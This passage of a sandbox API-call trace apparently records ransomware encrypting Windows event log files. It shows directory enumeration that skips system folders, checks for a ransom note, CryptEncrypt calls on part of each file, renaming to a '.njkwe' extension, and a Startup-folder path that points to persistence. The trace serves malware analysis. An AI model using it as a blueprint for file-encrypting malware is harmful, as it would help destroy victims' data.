hHeap=0xbe0000) returned 1 [0066.412] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.412] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.412] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.412] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.412] CloseHandle (hObject=0x428) returned 1 [0066.414] GetProcessHeap () returned 0xbe0000 [0066.414] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.414] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 75 [0066.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.415] GetProcessHeap () returned 0xbe0000 [0066.415] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.415] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0066.415] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="Windows") returned -1 [0066.415] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.415] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.415] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="Program Files") returned -1 [0066.415] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.415] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 61 [0066.415] StrStrIW (lpFirst="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.415] lstrcmpW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.415] lstrcmpW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="taridd") returned -1 [0066.415] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.415] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.416] GetTickCount () returned 0x115100a [0066.416] GetTickCount () returned 0x115100a [0066.416] GetTickCount () returned 0x115100a [0066.416] GetTickCount () returned 0x115100a [0066.416] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.416] GetProcessHeap () returned 0xbe0000 [0066.416] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.416] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.418] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.418] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.419] GetProcessHeap () returned 0xbe0000 [0066.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.419] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.419] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.419] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.419] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.419] CloseHandle (hObject=0x428) returned 1 [0066.421] GetProcessHeap () returned 0xbe0000 [0066.421] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.421] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.421] GetProcessHeap () returned 0xbe0000 [0066.421] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.421] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0066.421] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="Windows") returned -1 [0066.421] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.421] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.421] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="Program Files") returned -1 [0066.422] lstrcmpiW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.422] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 71 [0066.422] StrStrIW (lpFirst="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.422] lstrcmpW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.422] lstrcmpW (lpString1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpString2="taridd") returned -1 [0066.422] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.422] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.422] GetTickCount () returned 0x115100a [0066.422] GetTickCount () returned 0x115100a [0066.422] GetTickCount () returned 0x115100a [0066.422] GetTickCount () returned 0x115100a [0066.422] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.422] GetProcessHeap () returned 0xbe0000 [0066.422] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.422] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.424] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.424] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.424] GetProcessHeap () returned 0xbe0000 [0066.424] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.424] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.424] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.424] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.424] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.425] CloseHandle (hObject=0x428) returned 1 [0066.426] GetProcessHeap () returned 0xbe0000 [0066.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.426] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 91 [0066.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.427] GetProcessHeap () returned 0xbe0000 [0066.427] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.427] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0066.427] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="Windows") returned -1 [0066.427] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.427] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.427] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="Program Files") returned -1 [0066.427] lstrcmpiW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.427] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 59 [0066.427] StrStrIW (lpFirst="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.427] lstrcmpW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.427] lstrcmpW (lpString1="Microsoft-Windows-GroupPolicy%4Operational.evtx", lpString2="taridd") returned -1 [0066.428] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.428] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.428] GetTickCount () returned 0x115100a [0066.428] GetTickCount () returned 0x115100a [0066.428] GetTickCount () returned 0x115100a [0066.428] GetTickCount () returned 0x115100a [0066.428] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.428] GetProcessHeap () returned 0xbe0000 [0066.428] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.428] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.430] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.430] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.430] GetProcessHeap () returned 0xbe0000 [0066.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.430] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.430] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.431] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.431] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.431] CloseHandle (hObject=0x428) returned 1 [0066.433] GetProcessHeap () returned 0xbe0000 [0066.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.433] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.433] GetProcessHeap () returned 0xbe0000 [0066.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.433] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0066.433] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="Windows") returned -1 [0066.433] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.434] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.434] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="Program Files") returned -1 [0066.434] lstrcmpiW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.434] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 59 [0066.434] StrStrIW (lpFirst="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.434] lstrcmpW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.434] lstrcmpW (lpString1="Microsoft-Windows-HotspotAuth%4Operational.evtx", lpString2="taridd") returned -1 [0066.434] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.434] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.434] GetTickCount () returned 0x1151019 [0066.434] GetTickCount () returned 0x1151019 [0066.434] GetTickCount () returned 0x1151019 [0066.434] GetTickCount () returned 0x1151019 [0066.435] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.435] GetProcessHeap () returned 0xbe0000 [0066.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.435] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.436] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.436] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.437] GetProcessHeap () returned 0xbe0000 [0066.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.437] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.437] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.437] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.437] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.437] CloseHandle (hObject=0x428) returned 1 [0066.439] GetProcessHeap () returned 0xbe0000 [0066.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.439] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.439] GetProcessHeap () returned 0xbe0000 [0066.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.440] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0066.440] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="Windows") returned -1 [0066.440] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.440] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.440] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="Program Files") returned -1 [0066.440] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.440] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: 